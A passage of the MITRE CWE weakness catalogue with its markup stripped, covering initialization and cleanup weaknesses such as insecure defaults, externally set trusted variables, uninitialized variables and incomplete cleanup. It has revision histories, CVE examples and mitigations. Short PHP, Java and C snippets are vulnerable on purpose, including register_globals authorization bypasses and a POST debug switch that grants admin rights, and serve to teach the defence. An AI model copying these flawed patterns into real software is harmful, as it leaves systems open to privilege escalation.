file in the File Download dialog box. + https://www.cve.org/CVERecord?id=CVE-2002-0722 + + + + + UI Misrepresentation of Critical Information + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This entry should be broken down into more precise entries. See extended description. + Misrepresentation problems are frequently studied in web browsers, but there are no known efforts for classifying these kinds of problems in terms of the shortcomings of the interface. In addition, many misrepresentation issues are resultant. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-13 + Critical + Defined several different subtypes of this issue. + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, Other_Notes, References, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples, References, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + UI Misrepresentation of Critical Information + + + + The product, by default, initializes an internal variable with an insecure or less secure value than is possible. + + + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + An attacker could gain access to and modify sensitive data or system information. + + + + + System Configuration + Disable or change default settings when they can be used to abuse the system. Since those default settings are shipped with the product they are likely to be known by a potential attacker who is familiar with the product. For instance, default credentials should be changed or the associated accounts should be disabled. + + + + + This code attempts to login a user using credentials from a POST request: + + + + // $user and $pass automatically set from POST request + if (login_user($user,$pass)) {$authorized = true;} + ... + + if ($authorized) {generatePage();} + + Because the $authorized variable is never initialized, PHP will automatically set $authorized to any value included in the POST request if register_globals is enabled. An attacker can send a POST request with an unexpected third value 'authorized' set to 'true' and gain authorized status without supplying valid credentials. + Here is a fixed version: + + $user = $_POST['user'];$pass = $_POST['pass'];$authorized = false;if (login_user($user,$pass)) {$authorized = true;} + ... + + + + This code avoids the issue by initializing the $authorized variable to false and explicitly retrieving the login credentials from the $_POST variable. Regardless, register_globals should never be enabled and is disabled by default in current versions of PHP. + + + + + Insecure default variable initialization + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This overlaps other categories, probably should be split into separate items. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Maintenance_Notes, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors. + A product system should be reluctant to trust variables that have been initialized outside of its trust boundary, especially if they are initialized by users. The variables may have been initialized incorrectly. If an attacker can initialize the variable, then they can influence what the vulnerable system will do. + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Modify Application Data + An attacker could gain access to and modify sensitive data or system information. + + + + + Implementation + Input Validation + A product system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking (e.g. input validation) is performed when relying on input from outside a trust boundary. + + + Architecture and Design + Avoid any external control of variables. If necessary, restrict the variables that can be modified using an allowlist, and use a different namespace or naming convention if possible. + + + + + In the Java example below, a system property controls the debug level of the application. + + int debugLevel = Integer.getInteger("com.domain.application.debugLevel").intValue(); + + If an attacker is able to modify the system property, then it may be possible to coax the application into divulging sensitive information by virtue of the fact that additional debug information is printed/exposed as the debug level increases. + + + This code checks the HTTP POST request for a debug switch, and enables a debug mode if the switch is set. + + $debugEnabled = false;if ($_POST["debug"] == "true"){$debugEnabled = true;} + /.../ + + function login($username, $password){if($debugEnabled){echo 'Debug Activated';phpinfo();$isAdmin = True;return True;}} + + Any user can activate the debug mode, gaining administrator privileges. An attacker may also use the information printed by the phpinfo() function to further exploit the system. . + This example also exhibits Information Exposure Through Debug Information (CWE-215) + + + + + CVE-2000-0959 + Does not clear dangerous environment variables, enabling symlink attack. + https://www.cve.org/CVERecord?id=CVE-2000-0959 + + + CVE-2001-0033 + Specify alternate configuration directory in environment variable, enabling untrusted path. + https://www.cve.org/CVERecord?id=CVE-2001-0033 + + + CVE-2001-0872 + Dangerous environment variable not cleansed. + https://www.cve.org/CVERecord?id=CVE-2001-0872 + + + CVE-2001-0084 + Specify arbitrary modules using environment variable. + https://www.cve.org/CVERecord?id=CVE-2001-0084 + + + + + External initialization of trusted variables or values + + + SFP25 + Tainted input to variable + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Overlaps Missing variable initialization, especially in PHP. + + This is often found in PHP due to register_globals and the common practice of storing library/include files under the web document root so that they are available using a direct request. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Description + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + External Initialization of Trusted Variables or Values + External Initialization of Trusted Variables + + + + The product does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error or a hardware security module (HSM) cannot be activated, which can cause the product to execute in a less secure fashion than intended by the administrator. + + + + + + + + + + + Implementation + + + + + Integrity + Other + Modify Application Data + Alter Execution Logic + The application could be placed in an insecure state that may allow an attacker to modify sensitive data or allow unintended logic to be executed. + + + + + Implementation + Follow the principle of failing securely when an error occurs. The system should enter a state where it is not vulnerable and will not display sensitive error messages to a potential attacker. + + + + + The following code intends to limit certain operations to the administrator only. + + $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} + + # do stuff + if ($uid == 0) {DoAdminThings();} + + If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. + + + + + CVE-2005-1345 + Product does not trigger a fatal error if missing or invalid ACLs are in a configuration file. + https://www.cve.org/CVERecord?id=CVE-2005-1345 + + + + + Non-exit on Failed Initialization + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-studied. These issues are not frequently reported, and it is difficult to find published examples. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not initialize critical variables, which causes the execution environment to use unexpected values. + + + + + + + + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Quality Degradation + Varies by Context + The uninitialized data may be invalid, causing logic errors within the program. In some cases, this could result in a security problem. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Check that critical variables are initialized. + + + Testing + Use a static analysis tool to spot non-initialized variables. + + + + + This function attempts to extract a pair of numbers from a user-supplied string. + + void parse_data(char *untrusted_input){ + int m, n, error;error = sscanf(untrusted_input, "%d:%d", &m, &n);if ( EOF == error ){die("Did not specify integer value. Die evil hacker!\n");} + /* proceed assuming n and m are initialized correctly */ + + + } + + This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form: + + 123: + + then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457). + + + Here, an uninitialized field in a Java class is used in a seldom-called method, which would cause a NullPointerException to be thrown. + + private User user;public void someMethod() { + + + // Do something interesting. + ... + + // Throws NPE if user hasn't been properly initialized. + String username = user.getName(); + } + + + + This code first authenticates a user, then allows a delete command if the user is an administrator. + + if (authenticate($username,$password) && setAdmin($username)){$isAdmin = true;} + /.../ + + if ($isAdmin){deleteUser($userToDelete);} + + The $isAdmin variable is set to true if the user is an admin, but is uninitialized otherwise. If PHP's register_globals feature is enabled, an attacker can set uninitialized variables like $isAdmin to arbitrary values, in this case gaining administrator privileges by setting $isAdmin to true. + + + In the following Java code the BankManager class uses the user variable of the class User to allow authorized users to perform bank manager tasks. The user variable is initialized within the method setUser that retrieves the User from the User database. The user is then authenticated as unauthorized user through the method authenticateUser. + + public class BankManager { + + + + // user allowed to perform bank manager tasks + private User user = null;private boolean isUserAuthentic = false; + + // constructor for BankManager class + public BankManager() {...} + + // retrieve user from database of users + public User getUserFromUserDatabase(String username){...} + + // set user variable using username + public void setUser(String username) {this.user = getUserFromUserDatabase(username);} + + // authenticate user + public boolean authenticateUser(String username, String password) {if (username.equals(user.getUsername()) && password.equals(user.getPassword())) {isUserAuthentic = true;}return isUserAuthentic;} + + // methods for performing bank manager tasks + ... + } + + However, if the method setUser is not called before authenticateUser then the user variable will not have been initialized and will result in a NullPointerException. The code should verify that the user variable has been initialized before it is used, as in the following code. + + public class BankManager { + + + + // user allowed to perform bank manager tasks + private User user = null;private boolean isUserAuthentic = false; + + // constructor for BankManager class + public BankManager(String username) {user = getUserFromUserDatabase(username);} + + // retrieve user from database of users + public User getUserFromUserDatabase(String username) {...} + + // authenticate user + public boolean authenticateUser(String username, String password) { + if (user == null) {System.out.println("Cannot find user " + username);}else {if (password.equals(user.getPassword())) {isUserAuthentic = true;}}return isUserAuthentic; + } + + + + // methods for performing bank manager tasks + ... + + + + } + + + + This example will leave test_string in an + unknown condition when i is the same value as err_val, + because test_string is not initialized + (CWE-456). Depending on where this code segment appears + (e.g. within a function body), test_string might be + random if it is stored on the heap or stack. If the + variable is declared in static memory, it might be zero + or NULL. Compiler optimization might contribute to the + unpredictability of this address. + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + When the printf() is reached, + test_string might be an unexpected address, so the + printf might print junk strings (CWE-457). + + To fix this code, there are a couple approaches to + making sure that test_string has been properly set once + it reaches the printf(). + One solution would be to set test_string to an + acceptable default before the conditional: + + + char *test_string = "Done at the beginning"; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + Another solution is to ensure that each + branch of the conditional - including the default/else + branch - could ensure that test_string is set: + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + else { + test_string = "Done on the other side!"; + } + printf("%s", test_string); + + + + + + CVE-2020-6078 + Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) + https://www.cve.org/CVERecord?id=CVE-2020-6078 + + + CVE-2009-2692 + Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476). + https://www.cve.org/CVERecord?id=CVE-2009-2692 + + + CVE-2020-20739 + A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage + https://www.cve.org/CVERecord?id=CVE-2020-20739 + + + CVE-2005-2978 + Product uses uninitialized variables for size and index, leading to resultant buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2005-2978 + + + CVE-2005-2109 + Internal variable in PHP application is not initialized, allowing external modification. + https://www.cve.org/CVERecord?id=CVE-2005-2109 + + + CVE-2005-2193 + Array variable not initialized in PHP application, leading to resultant SQL injection. + https://www.cve.org/CVERecord?id=CVE-2005-2193 + + + + + Missing Initialization + + + SFP1 + Glitch in computation + + + ERR30-C + Set errno to zero before calling a library function known to set errno, and check errno only after the function returns a value indicating failure + CWE More Abstract + + + DCL04-PL + Always initialize local variables + Exact + + + DCL33-PL + Declare identifiers before using them + Imprecise + + + ASCSM-CWE-456 + + + ASCRM-CWE-456 + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is a major factor in a number of resultant weaknesses, especially in web applications that allow global variable initialization (such as PHP) with libraries that can be directly requested. + It is highly likely that a large number of resultant weaknesses have missing initialization as a primary factor, but researcher reports generally do not provide this level of detail. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Name, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Initialization + + + + The code uses a variable that has not been initialized, leading to unpredictable or unintended results. + In some languages such as C and C++, stack variables are not initialized by default. They generally contain junk data with the contents of stack memory before the function was invoked. An attacker can sometimes control or read these contents. In other languages or conditions, a variable that is not explicitly initialized can be given a default value that has security implications, depending on the logic of the program. The presence of an uninitialized variable can sometimes indicate a typographic error in the code. + + + + + + + + + + + + + + + Implementation + In C, using an uninitialized char * in some string libraries will return incorrect results, as the libraries expect the null terminator to always be at the end of a string, even if the string is empty. + + + High + + + Availability + Integrity + Other + Other + Initial variables usually contain junk, which can not be trusted for consistency. This can lead to denial of service conditions, or modify control flow in unexpected ways. In some cases, an attacker can "pre-initialize" the variable using previous actions, which might enable code execution. This can cause a race condition if a lock variable check passes when it should not. + + + Authorization + Other + Other + Strings that are not initialized are especially dangerous, since many functions expect a null at the end -- and only at the end -- of a string. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Attack Surface Reduction + Assign all variables to an initial value. + + + Build and Compilation + Compilation or Build Hardening + Most compilers will complain about the use of uninitialized variables if warnings are turned on. + + + Implementation + Operation + When using a language that does not require explicit declaration of variables, run or compile the software in a mode that reports undeclared or unknown variables. This may indicate the presence of a typographic error in the variable's name. + + + Requirements + The choice could be made to use a language that is not susceptible to these issues. + + + Architecture and Design + Mitigating technologies such as safe string libraries and container abstractions could be introduced. + + + + + This code prints a greeting using information stored in a POST request: + + if (isset($_POST['names'])) {$nameArray = $_POST['names'];}echo "Hello " . $nameArray['first']; + + This code checks if the POST array 'names' is set before assigning it to the $nameArray variable. However, if the array is not in the POST request, $nameArray will remain uninitialized. This will cause an error when the array is accessed to print the greeting message, which could lead to further exploit. + + + The following switch statement is intended to set the values of the variables aN and bN before they are used: + + int aN, Bn;switch (ctl) { + case -1:aN = 0;bN = 0;break; + case 0:aN = i;bN = -i;break; + case 1:aN = i + NEXT_SZ;bN = i - NEXT_SZ;break; + default:aN = -1;aN = -1;break; + + }repaint(aN, bN); + + In the default case of the switch statement, the programmer has accidentally set the value of aN twice. As a result, bN will have an undefined value. Most uninitialized variable issues result in general software reliability problems, but if attackers can intentionally trigger the use of an uninitialized variable, they might be able to launch a denial of service attack by crashing the program. Under the right circumstances, an attacker may be able to control the value of an uninitialized variable by affecting the values on the stack prior to the invocation of the function. + + + This example will leave test_string in an + unknown condition when i is the same value as err_val, + because test_string is not initialized + (CWE-456). Depending on where this code segment appears + (e.g. within a function body), test_string might be + random if it is stored on the heap or stack. If the + variable is declared in static memory, it might be zero + or NULL. Compiler optimization might contribute to the + unpredictability of this address. + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + When the printf() is reached, + test_string might be an unexpected address, so the + printf might print junk strings (CWE-457). + + To fix this code, there are a couple approaches to + making sure that test_string has been properly set once + it reaches the printf(). + One solution would be to set test_string to an + acceptable default before the conditional: + + + char *test_string = "Done at the beginning"; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + Another solution is to ensure that each + branch of the conditional - including the default/else + branch - could ensure that test_string is set: + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + else { + test_string = "Done on the other side!"; + } + printf("%s", test_string); + + + + + + CVE-2019-15900 + Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). + https://www.cve.org/CVERecord?id=CVE-2019-15900 + + + CVE-2008-3688 + Chain: A denial of service may be caused by an uninitialized variable (CWE-457) allowing an infinite loop (CWE-835) resulting from a connection to an unresponsive server. + https://www.cve.org/CVERecord?id=CVE-2008-3688 + + + CVE-2008-0081 + Uninitialized variable leads to code execution in popular desktop application. + https://www.cve.org/CVERecord?id=CVE-2008-0081 + + + CVE-2007-4682 + Crafted input triggers dereference of an uninitialized object pointer. + https://www.cve.org/CVERecord?id=CVE-2007-4682 + + + CVE-2007-3468 + Crafted audio file triggers crash when an uninitialized variable is used. + https://www.cve.org/CVERecord?id=CVE-2007-3468 + + + CVE-2007-2728 + Uninitialized random seed variable used. + https://www.cve.org/CVERecord?id=CVE-2007-2728 + + + + + Uninitialized variable + + + Uninitialized Variable + + + SFP1 + Glitch in computation + + + DCL33-PL + Declare identifiers before using them + Imprecise + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Observed_Example, Other_Notes, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Common_Consequences, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Description, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Modes_of_Introduction, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Uninitialized Variable + + + + This weakness has been deprecated because its name and description did not match. The description duplicated CWE-454, while the name suggested a more abstract initialization problem. Please refer to CWE-665 for the more abstract problem. + + Prohibited + This CWE has been deprecated. + CWE-665 or its descendants may be appropriate. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Incorrect Initialization + + + + The product does not properly "clean up" and remove temporary or supporting resources after they have been used. + + + + + + + + + + Insufficient Cleanup + + + + + Implementation + + + + + Other + Confidentiality + Integrity + Other + Read Application Data + Modify Application Data + DoS: Resource Consumption (Other) + It is possible to overflow the number of temporary files because directories typically have limits on the number of files allowed. This could create a denial of service problem. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Implementation + Temporary files and other supporting resources should be deleted/released immediately after they are no longer needed. + + + + + Stream resources in a Java application should be released in a finally block, otherwise an exception thrown before the call to close() would result in an unreleased I/O resource. In the example below, the close() method is called in the try block (incorrect). + + try {InputStream is = new FileInputStream(path);byte b[] = new byte[is.available()];is.read(b);is.close();} catch (Throwable t) {log.error("Something bad happened: " + t.getMessage());} + + + + + + CVE-2000-0552 + World-readable temporary file not deleted after use. + https://www.cve.org/CVERecord?id=CVE-2000-0552 + + + CVE-2005-2293 + Temporary file not deleted after use, leaking database usernames and passwords. + https://www.cve.org/CVERecord?id=CVE-2005-2293 + + + CVE-2002-0788 + Interaction error creates a temporary file that can not be deleted due to strong permissions. + https://www.cve.org/CVERecord?id=CVE-2002-0788 + + + CVE-2002-2066 + Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). + https://www.cve.org/CVERecord?id=CVE-2002-2066 + + + CVE-2002-2067 + Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). + https://www.cve.org/CVERecord?id=CVE-2002-2067 + + + CVE-2002-2068 + Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). + https://www.cve.org/CVERecord?id=CVE-2002-2068 + + + CVE-2002-2069 + Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). + https://www.cve.org/CVERecord?id=CVE-2002-2069 + + + CVE-2002-2070 + Alternate data streams for NTFS files are not cleared when files are wiped (alternate channel / infoleak). + https://www.cve.org/CVERecord?id=CVE-2002-2070 + + + CVE-2005-1744 + Users not logged out when application is restarted after security-relevant changes were made. + https://www.cve.org/CVERecord?id=CVE-2005-1744 + + + + File Processing + + + + Incomplete Cleanup + + + A10 + Insecure Configuration Management + CWE More Specific + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + MEM31-C + Free dynamically allocated memory when no longer needed + CWE More Abstract + + + FIO04-J + Release resources when they are no longer needed + + + FIO00-J + Do not operate on files in shared directories + + + SFP14 + Failure to release resource + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + CWE-459 is a child of CWE-404 because, while CWE-404 covers any type of improper shutdown or release of a resource, CWE-459 deals specifically with a multi-step shutdown process in which a crucial step for "proper" cleanup is omitted or impossible. That is, CWE-459 deals specifically with a cleanup or shutdown process that does not successfully remove all potentially sensitive data. + Overlaps other categories such as permissions and containment. Concept needs further development. This could be primary (e.g. leading to infoleak) or resultant (e.g. resulting from unhandled error conditions or early termination). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE 